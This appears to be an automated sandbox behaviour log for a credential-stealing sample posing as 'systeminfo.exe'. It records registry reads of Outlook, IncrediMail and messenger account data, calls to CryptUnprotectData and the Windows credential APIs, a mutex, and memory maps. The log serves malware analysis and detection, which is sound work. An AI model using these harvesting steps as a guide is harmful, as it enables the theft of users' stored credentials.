Open Key HKEY_CURRENT_USER\Software\IncrediMail\Identities - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Group Mail - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\MessengerService - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Yahoo\Pager - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail - False 1
Fn
Read Value HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} value_name = Username, data = Main Identity, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User, data = sdjwh@dive.djh, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Server, data = fgerh, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Display Name, data = fvmmeu dufn, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Email, data = sdjwh@dive.djh, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Server, data = hthr, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Use SPA, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = POP3 User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = IMAP User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = HTTP User, data = 104, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP User, data = 104, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Identities - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Identities - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles - False 1
Fn
Module (32)
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x742f0000 True 1
Fn
Load shell32.dll base_address = 0x75c50000 True 1
Fn
Load pstorec.dll base_address = 0x74150000 True 1
Fn
Load crypt32.dll base_address = 0x758d0000 True 2
Fn
Load advapi32.dll base_address = 0x756e0000 True 3
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 2
Fn
Get Filename - process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 True 2
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll function = InitCommonControlsEx, address_out = 0x743109ce True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathA, address_out = 0x75e9fb26 True 1
Fn
Get Address c:\windows\syswow64\pstorec.dll function = PStoreCreateInstance, address_out = 0x7415526c True 1
Get Address c:\windows\syswow64\crypt32.dll function = CryptUnprotectData, address_out = 0x75905a7f True 2
Get Address c:\windows\syswow64\advapi32.dll function = CredReadA, address_out = 0x757271c1 True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredFree, address_out = 0x756eb2ec True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredDeleteA, address_out = 0x75727941 True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateA, address_out = 0x75727381 True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateW, address_out = 0x75727481 True 3
System (2)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 1
Get Info type = Operating System False 1
Ini (7)
Operation Filename Additional Information Success Count Logfile
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = AddExportHeaderLine, default_value = 0 True 1
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = WinPos False 1
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = Columns False 1
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Process #13: systeminfo.exe
(Host: 63, Network: 0)
Information Value
ID #13
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:49, Reason: Autostart
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:00:34
OS Process Information
Information Value
PID 0x5d8
Parent PID 0x4ec (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f544 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 5DC
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x00081fff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0009dfff Private Memory Readable, Writable, Executable True False False
private_0x00000000000a0000 0x000a0000 0x000adfff Private Memory Readable, Writable True False False
private_0x00000000000b0000 0x000b0000 0x000effff Private Memory Readable, Writable True False False
locale.nls 0x000f0000 0x00156fff Memory Mapped File Readable False False False
private_0x0000000000160000 0x00160000 0x001dffff Private Memory Readable, Writable True False False
private_0x0000000000160000 0x00160000 0x0016ffff Private Memory Readable, Writable, Executable True False False
private_0x00000000001a0000 0x001a0000 0x001dffff Private Memory Readable, Writable True False False
private_0x0000000000240000 0x00240000 0x0024ffff Private Memory Readable, Writable True False False
private_0x0000000000250000 0x00250000 0x0034ffff Private Memory Readable, Writable True False False
systeminfo.exe 0x003d0000 0x003eefff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x00000000003f0000 0x003f0000 0x00577fff Pagefile Backed Memory Readable True False False
private_0x00000000005b0000 0x005b0000 0x005bffff Private Memory Readable, Writable True False False
private_0x00000000005c0000 0x005c0000 0x0063ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000640000 0x00640000 0x007c0fff Pagefile Backed Memory Readable True False False
private_0x0000000000810000 0x00810000 0x0090ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01d10000 0x01fdefff Memory Mapped File Readable False False False
pagefile_0x0000000001fe0000 0x01fe0000 0x020befff Pagefile Backed Memory Readable True False False
private_0x00000000020c0000 0x020c0000 0x02490fff Private Memory Readable, Writable True False False
private_0x00000000024a0000 0x024a0000 0x0259ffff Private Memory Readable, Writable True False False
uxtheme.dll 0x73480000 0x734fffff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x73640000 0x73690fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x736a0000 0x736d1fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x736e0000 0x736f3fff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x73700000 0x73707fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73710000 0x7376bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73770000 0x737aefff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74b20000 0x74b2bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74b30000 0x74b8ffff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x74b90000 0x74be6fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x74d90000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x74e30000 0x74f3ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x74f90000 0x7502cfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75030000 0x75039fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75040000 0x7513ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75140000 0x7519ffff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x751c0000 0x7531bfff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75f70000 0x7605ffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76370000 0x7643bfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76440000 0x764cefff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x764d0000 0x7655ffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76700000 0x76745fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76b00000 0x76babfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x76bb0000 0x76bc8fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076bd0000 0x76bd0000 0x76cc9fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x76df0000 0x76f98fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x76fd0000 0x7714ffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Host Behavior
Module (43)
Operation Module Additional Information Success Count Logfile
Load msvcrt.dll base_address = 0x76b00000 True 1
Load KERNEL32.dll base_address = 0x74e30000 True 2
Load USER32.dll base_address = 0x75040000 True 1
Load ADVAPI32.dll base_address = 0x74d90000 True 1
Get Handle c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe base_address = 0x3d0000 True 1
Get Filename c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 259 True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x34faac True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x34fae4 True 1
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x34fb54 True 1
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x34fb54 True 1
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x34fb54 True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x34fb54 True 1
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x34fb54 True 1
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x34fb54 True 1
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x34fb54 True 1
Get Address c:\windows\syswow64\msvcrt.dll function = strchr, address_out = 0x76b0dbeb True 1
Get Address c:\windows\syswow64\msvcrt.dll function = free, address_out = 0x76b09894 True 1
Get Address c:\windows\syswow64\msvcrt.dll function = malloc, address_out = 0x76b09cee True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x74ee6aa8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x74e41700 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x74e6828e True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x74e44435 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x74e45929 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x74e63102 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x74e454ee True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x74e44442 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x74e41245 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x74e414b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x74e5b6e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameExA, address_out = 0x74ec42ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x74e45a4b True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x74e5eceb True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x74e411c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x74e414e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x76ffe026 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x74e414c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x74e411a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x74e41809 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x74e411f8 True 1
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x7506ae5f True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameA, address_out = 0x74dba4b4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x74ec3f49 True 1
System (13)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 1
Get Computer Name result_out = YKyd69q, type = ComputerNameDnsHostname True 1
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Get Time type = Local Time, time = 2017-11-28 18:19:40 (Local Time) True 5
Get Time type = Ticks, time = 13384 True 4
Get Time type = Local Time, time = 2017-11-28 18:19:41 (Local Time) True 1
Mutex (6)
Operation Additional Information Success Count Logfile
Open mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE False 6
Process #14: systeminfo.exe
(Host: 106, Network: 59)
Information Value
ID #14
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:03, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:00:20
OS Process Information
Information Value
PID 0x79c
Parent PID 0x5d8 (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f544 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 7A0
0x 7A4
0x 318
0x 760
0x 7D4
0x 794
0x 790
0x 78C
0x 784
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False
private_0x00000000000b0000 0x000b0000 0x000c1fff Private Memory Readable, Writable True False False
private_0x00000000000d0000 0x000d0000 0x000dffff Private Memory Readable, Writable True False False
private_0x00000000000e0000 0x000e0000 0x000edfff Private Memory Readable, Writable, Executable True False False
private_0x00000000000f0000 0x000f0000 0x000fdfff Private Memory Readable, Writable True False False
private_0x0000000000100000 0x00100000 0x0010ffff Private Memory Readable, Writable, Executable True False False
private_0x0000000000110000 0x00110000 0x0020ffff Private Memory Readable, Writable True False False
locale.nls 0x00210000 0x00276fff Memory Mapped File Readable False False False
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000002d0000 0x002d0000 0x002dffff Private Memory Readable, Writable True False False
pagefile_0x00000000002d0000 0x002d0000 0x002d4fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False
private_0x00000000002e0000 0x002e0000 0x0035ffff Private Memory Readable, Writable True False False
systeminfo.exe 0x00360000 0x0037dfff Memory Mapped File Readable True False False
rsaenh.dll 0x00360000 0x0039bfff Memory Mapped File Readable False False False
rsaenh.dll 0x00360000 0x0039bfff Memory Mapped File Readable False False False
pagefile_0x0000000000360000 0x00360000 0x00364fff Pagefile Backed Memory Readable, Writable True False False
windowsshell.manifest 0x00360000 0x00360fff Memory Mapped File Readable False False False
index.dat 0x00360000 0x0036bfff Memory Mapped File Readable, Writable True False False
pagefile_0x0000000000370000 0x00370000 0x00371fff Pagefile Backed Memory Readable True False False
index.dat 0x00380000 0x00387fff Memory Mapped File Readable, Writable True False False
index.dat 0x00390000 0x0039ffff Memory Mapped File Readable, Writable True False False
private_0x00000000003a0000 0x003a0000 0x003a0fff Private Memory Readable, Writable True False False
pagefile_0x00000000003a0000 0x003a0000 0x003a0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003b0000 0x003b0000 0x003b0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003c0000 0x003c0000 0x003c0fff Pagefile Backed Memory Readable True False False
systeminfo.exe 0x003d0000 0x003eefff Memory Mapped File Readable, Writable, Executable True False False
private_0x00000000003f0000 0x003f0000 0x004bffff Private Memory Readable, Writable True False False
